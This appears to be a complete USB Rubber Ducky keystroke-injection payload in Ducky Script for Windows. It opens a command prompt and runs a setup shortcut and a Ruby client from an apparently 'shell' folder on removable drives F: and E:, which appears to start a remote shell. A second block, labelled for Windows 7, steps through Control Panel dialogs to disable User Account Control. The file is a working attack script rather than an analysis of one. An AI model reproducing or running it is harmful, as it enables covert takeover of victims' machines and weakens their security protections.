DELAY 5000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
ENTER
STRING call F:/client/scripts/setup.Lnk
ENTER
DELAY 500
STRING call E:/client/scripts/setup.Lnk
ENTER
DELAY 1500
LEFTARROW
ENTER
DELAY 2000
ENTER
DELAY 500 
ENTER
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER

DELAY 10000
STRING ruby F:/client/shell/client.rb
ENTER
DELAY 500
STRING ruby E:/client/shell/client.rb
ENTER
DELAY 200
STRING exit
ENTER








REM disable uac win7
DELAY 2000
GUI r
DELAY 200
STRING control
DELAY 100
ENTER
DELAY 5000
STRING virus
DELAY 1500
ENTER
TAB
ENTER
DELAY 2000
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
ENTER
DELAY 2000
TAB
DOWNARROW
DOWNARROW
TAB
ENTER
DELAY 5000
LEFTARROW
ENTER
DELAY 2000
ALT F4

END
			